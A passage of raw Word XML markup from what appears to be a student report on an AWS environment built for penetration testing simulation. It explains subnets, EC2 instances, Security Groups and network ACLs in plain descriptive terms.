    <w:p w14:paraId="2916F2CB" w14:textId="1BC842DE" w:rsidR="002A55B8" w:rsidRPr="002F4B94" w:rsidRDefault="002A55B8" w:rsidP="002F4B94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F4B94">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>10.0.4.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706D1FD9" w14:textId="14BC95D0" w:rsidR="002A55B8" w:rsidRPr="00D77DFE" w:rsidRDefault="002A55B8" w:rsidP="00A02D1D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Subnets can be </w:t>
      </w:r>
      <w:r w:rsidR="005D748C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>categorized</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as public </w:t>
      </w:r>
      <w:r w:rsidR="005D748C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>private based on their routing configuration</w:t>
      </w:r>
      <w:r w:rsidR="00C4423B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256BBA53" w14:textId="3675AECE" w:rsidR="002A55B8" w:rsidRPr="00D77DFE" w:rsidRDefault="002A55B8" w:rsidP="00A02D1D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Public subnet</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="005D748C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>is a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> subnet </w:t>
      </w:r>
      <w:r w:rsidR="005D748C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">which </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>has a route to an Internet Gateway. Resources within a public subnet can directly communicate with the public internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D7CA9C" w14:textId="05BD79FB" w:rsidR="002A55B8" w:rsidRPr="00D77DFE" w:rsidRDefault="002A55B8" w:rsidP="00A02D1D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A02D1D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Private subnet</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="005D748C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>is a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> subnet </w:t>
      </w:r>
      <w:r w:rsidR="005D748C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">that does not has </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">a direct route to an Internet Gateway. Resources in a private subnet </w:t>
      </w:r>
      <w:r w:rsidR="005D748C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">need </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>a NAT device to initiate outbound internet communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770068EE" w14:textId="5EF01072" w:rsidR="005864C8" w:rsidRPr="00D77DFE" w:rsidRDefault="002A55B8" w:rsidP="00A02D1D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>This separation improves security by limiting internet exposure only to necessary resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442903B0" w14:textId="53B50AC2" w:rsidR="005D748C" w:rsidRPr="00D77DFE" w:rsidRDefault="007B1547" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc223521086"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.7 </w:t>
      </w:r>
      <w:r w:rsidR="00A62A28" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EC2 Instances</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="6DBF6630" w14:textId="41DFDED4" w:rsidR="005D748C" w:rsidRPr="00D77DFE" w:rsidRDefault="002A55B8" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> EC2 </w:t>
      </w:r>
      <w:r w:rsidR="00B3529B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">which </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>provides virtual machines that act as compute resources within the AWS</w:t>
      </w:r>
      <w:r w:rsidR="00B15F1B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>cloud. EC2 instances can run various operating systems, such as Linux distributions (e.g., Ubuntu or Kali Linux) and Microsoft Windows. These instances are deployed within the defined subnets of the VPC and serve as hosts for applications and services used in the penetration testing simulation</w:t>
      </w:r>
      <w:r w:rsidR="00A8200C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> in this work</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002F2EAE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="23" w:name="paragraph8"/>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"resource8"</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F2EAE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="795110D2" w14:textId="6C7AF99C" w:rsidR="005D748C" w:rsidRPr="00D77DFE" w:rsidRDefault="007C1F80" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc223521087"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.8 </w:t>
      </w:r>
      <w:r w:rsidR="00A62A28" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Security Grou</w:t>
      </w:r>
      <w:r w:rsidR="005D748C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="135AE9F6" w14:textId="3C709514" w:rsidR="002A55B8" w:rsidRPr="00D77DFE" w:rsidRDefault="002A55B8" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Security Groups</w:t>
      </w:r>
      <w:r w:rsidR="00DD429B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> are</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D748C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>represent</w:t>
      </w:r>
      <w:r w:rsidR="00DD429B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="005D748C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">as stateful virtual firewalls </w:t>
      </w:r>
      <w:r w:rsidR="00DD429B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">which </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">control inbound and outbound traffic at the instance level. They </w:t>
      </w:r>
      <w:r w:rsidR="00124965" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidR="00DD429B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">control </w:t>
      </w:r>
      <w:r w:rsidR="00124965" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> traffic based on defined rules and automatically allow return traffic for permitted connections, even if </w:t>
      </w:r>
      <w:r w:rsidR="00124965" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>outbound rules are not explicitly</w:t>
      </w:r>
      <w:r w:rsidR="00354068" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> configured</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0221FD4F" w14:textId="447449BA" w:rsidR="00084D54" w:rsidRPr="00D77DFE" w:rsidRDefault="002A55B8" w:rsidP="00420160">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Security Groups are</w:t>
      </w:r>
      <w:r w:rsidR="00DD429B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> mainly</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> associated with resources such as EC2 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">instances </w:t>
      </w:r>
      <w:r w:rsidR="00DD429B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> network interfaces. They play a</w:t>
      </w:r>
      <w:r w:rsidR="00DD429B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">n important </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>role in controlling network exposure and are a common source of misconfigurations in cloud environments.</w:t>
      </w:r>
      <w:r w:rsidR="002F2EAE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="25" w:name="paragraph5"/>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"resource5"</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F2EAE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002F2EAE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="26" w:name="paragraph9"/>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"resource9"</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F2EAE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>[9]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC435CC" w14:textId="42E1785E" w:rsidR="00DD429B" w:rsidRPr="00D77DFE" w:rsidRDefault="007C1F80" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc223521088"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.9 </w:t>
      </w:r>
      <w:r w:rsidR="00A62A28" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
      <w:r w:rsidR="00760AE4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A62A28" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ACLs (NACLs)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="7D9EFE6F" w14:textId="2516F9F5" w:rsidR="00A62A28" w:rsidRPr="00D77DFE" w:rsidRDefault="00E83FE0" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>NACL</w:t>
      </w:r>
      <w:r w:rsidR="001618B2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidR="002A55B8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidR="00DD429B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">represented as </w:t>
      </w:r>
      <w:r w:rsidR="002A55B8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>stateless firewalls that operate at the subnet level. Unlike Security Groups, both inbound and outbound traffic must be explicitly</w:t>
      </w:r>
      <w:r w:rsidR="00DD429B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> configured</w:t>
      </w:r>
      <w:r w:rsidR="002A55B8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>, as return traffic is not automatically allowed.</w:t>
      </w:r>
      <w:r w:rsidR="002F2EAE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="28" w:name="paragraph10"/>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"resource10"</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F2EAE" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>[10]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidR="009A7F16" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
